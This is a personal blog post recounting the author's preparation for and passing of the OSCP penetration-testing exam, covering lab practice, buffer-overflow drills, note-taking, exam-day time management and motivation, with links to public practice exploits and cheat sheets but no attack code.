Well, I began my hacking journey, I started my journey as a bug hunter. From starting I decided one day I will get OSCP. While doing bug hunting I got HOF in well-known top security companies like Tenable-Nessus, SONICWALL, CERT-EU, etc, Two times in top 15 security researchers in Nation’s Critical Information Infrastructure(NCIIPC), which is an organization of the Indian Government. I have CEH, eJPT, MCSA certifications. Additionally, I am two times state winner in the Gujarat State Power Lifting Championship competition(2016-17,18). Also, got the third rank in Gujarat Technological University (2016-17). I am sharing my time management skill with everyone for the OSCP exam so everyone will archive this cool cert with passion.
Let's begin
Before starting penetration testing training(OSCP), Due to Covid, every country had its own lockdown time period. Under the country lockdown, I did other certifications too to gain knowledge to cover my doubts and to keep polishing my skills. Currently, I am doing a Full-time job in the infosec field. I get less time for my PWK labs. So, every day after my office hours I daily spent 2 to 3 hours on a Hack the Box machine from TJnull sheet, which helped me to dive deep into the concept of how a small vulnerability will convert into RCE. OSCP is mainly focused on how to get RCE. That's why I like it because I am from a bug hunting background and it is a small part of OSCP 😊 After lockdown, I had only Sunday for my core study, every sunday I did only HTB and read the same HTB machine with different walkthrough methods while doing this. Whenever I completed my htb machine at that time I crossed out my calendar entry. So, I knew how many machines are still left.
The first month,
In the second month,
I know how GitHub helps us more with an easy script. Even my friends called me so many times on Sunday for hangouts but I didn't go out with them for few months. Before enrolling in PWK my life was like WAKE UP, OFFICE WORK, LUNCH, OFFICE WORK, DINNER, HTB, SLEEP, REPEAT. While studied my own infosec stuff, sometimes I was very depressed at that time I remembered my best anime character's thoughts: "DBS: Push through the pain, giving up hurts more. – Prince Vegeta; NARUTO: Hard work is worthless for those that don’t believe in themselves. – Naruto Uzumaki" Also below mention song motivates me a lot. After listening to this song, Again I started my work with good vibes.
First, I want to say thank you to all my close friends, family members, and co-workers who believe in me. During my lab time, my laptop crashed so I need to upgrade the ram to improve my laptop performance. So, I just ask one of my close friend for his laptop and he is the only one who told me "Yes, whenever you want my laptop just take it". I do not want to share his name due to privacy but yes I sharing his nickname "KIAN-K9". Also, I have a good connection with some local shops. So, I bought some hardware from them. Now, my kali VM was upgraded to high spec. Offsec has a very good discord server. I found so many people over there who did OSCP and I made very good connections with them. Also, they all are from different infosec fields. They all have very good knowledge of security concepts. At the same time, I felt very bad for myself because as compared to them my knowledge was nowhere near them. Then, I remembered the "Try Harder" mantra. I set my mind to learn new hacking stuff every day and kept improving my knowledge. I never stopped learning😎
PWK Lab
Let's enter the lab, I spent some time going through the OffSec forums, downloading material, and checking the control panel. Now offsec provides a pathway for easy to insane machines. After connecting to the VPN you will get the path link below your OSID number. On the first day, I was very excited about my lab. There are Public, IT, Dev and Admin networks in the lab environment. There are also sandbox environments and a forum. I have completed 35+ of the machines on the Public, IT, Dev, admin Networks. So, must be learned pivoting because this thing really helps to chain the exploit. My good advice for everyone who is willing to pass OSCP in a single shot. Please go with the lab report. I know it is painful because the new pdf has 850+ pages and there are a lot of exercises too. You will get the same machine on HTB and VULHUB so you can practice on that too. As per my point of view, lab exercise is more insane than lab machine, once you reach the active directory point then you will feel the real pain but don't give up because you already reached the end of the lab exercise. I did my lab report in 10 days, now I have 50 days left for my lab machines. One more good advice for everyone to make good notes for everything because these things will help you in the exam. Believe me, I have 50 + pages of notes and It helped me to do work in fast mode. Once you do this you don't need to do a lot of google search in your exam time. For the web, you must make your own wordlist, it will help you a lot for fast search because some time dirtbuster or gobuster will not complete the whole word list. Must watch ALPHA, BETA machine from a forum and understand how "g0tmilk" hack the machines.
Before my exam, I did so many Buffer Overflow(BOF) applications. Because this is really the chocolate point. It will be enough for you to study the subject from PDF and videos, understand the details and practice the relevant application, to solve the bof in the exam. It is my suggestion to mention BOF done before enrolling in the exam.
1) SLMail: https://www.exploit-db.com/exploits/638/
2) Minishare 1.4.1: https://www.exploit-db.com/exploits/636/
3) Savant 3.1: https://www.exploit-db.com/exploits/10434/
Final Exam Day🤖
Cheat Sheet
[Beleive me you will get everything from the below links.]
https://oscpnotes.infosecsanyam.in/My_OSCP_Preparation_Notes.html
https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65
https://book.hacktricks.xyz/pentesting-methodology
https://cheatsheet.haax.fr/other-systems/
Game Day
Offsec took a session of 15 minutes before your exam starts. Verification was done from offsec then I started my exam. I made one google sheet like you shown in the images. I followed my plan because everyone does not manage the time in exams and they fail. I have done a lot of hands-on practice on so many different bof applications. In my group, few people have done bof under 25 mins. Because of them, I am improving my speed to do bof in under 2 hours. So, I did bof in 1.45 hours with all steps and made POC + 15 min to cross-verify those POC. While I was doing this I ran autorecon tool in the background for the rest machines. It was very helpful for me to check all the enumeration information in one single window.
Now I have 25 points on my bucket list. The next goal was to take down a 20 pointer machine. It took me 2 more hours to exploit this machine and I followed the same as my plan but everyone knows the plan always doesn't work the way it meant to be. It got messed up. so the same thing happened to me. After that, I started going with another 20 pointer machine. It killed me from inside because I didn't even find any suspicious stuff while scanning. I checked every stuff so I just left the machine after spending 4 hours on it. Instead, I went with the next big 25 point machine. In the beginning, I spent approx 2 hours on enumeration then after that I found the injection point.
I got 25 + 20 + 12 = 57 points in my hand. (offsec never said how many points you will get on the user part. I cracked the user part for a 25 pointer machine, so I put the value from my best knowledge). I needed 70 points to pass the exam. I left that machine and went with the 10 pointer machine, but I need some rest for my body. So, I took only 3.5 hours of sleep during my whole exam time. After waking up, I go with a fresh mind on that 10 pointer machine. It was a unique vulnerability after spending 3 hours on that than after I got the shell, BOOM!!!😉
Now I was very happy🥂, I have 25 + 20 + 10 + 12 = 67 point in my hand. Let's start the pending machine. I spent approx 10+ hours to get the user shell on that 20 pointer machine. So, finally, I got it and I was so relieved. Then I had only 4 hours left to end my exam. Still, I was not able to crack 25 pointers and 20 pointers. After taking a small break, I started again on that 25 pointer machine. I again started looking at my enumeration stuff and a man I am really dumb to look at web hosting services. I search that web service on google and I got my exploit 😈. Finally at the end of my exam I got a total of 25 + 25 + 20 + 10 + 10 = 90 points in my hand. I was so relieved. That night I happily slept for 11 hours.
I am working on my exam report. Yes, I have my lab report too😉. It took time to finish my exam report. Again I worked twice for my exam report to make it before my end time.
Exam Report: 45+ pages
Lab Report: 410+ pages
Submitted the exam report after few days, I finally got an email from offsec saying, "We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification."
Conclusion
So many sleepless nights, hard work, never give up & lastly, do not forget to “Try Harder”.
If you have any query or doubts let's connect on LinkedIn: Click Here
Thank you for Reading!!!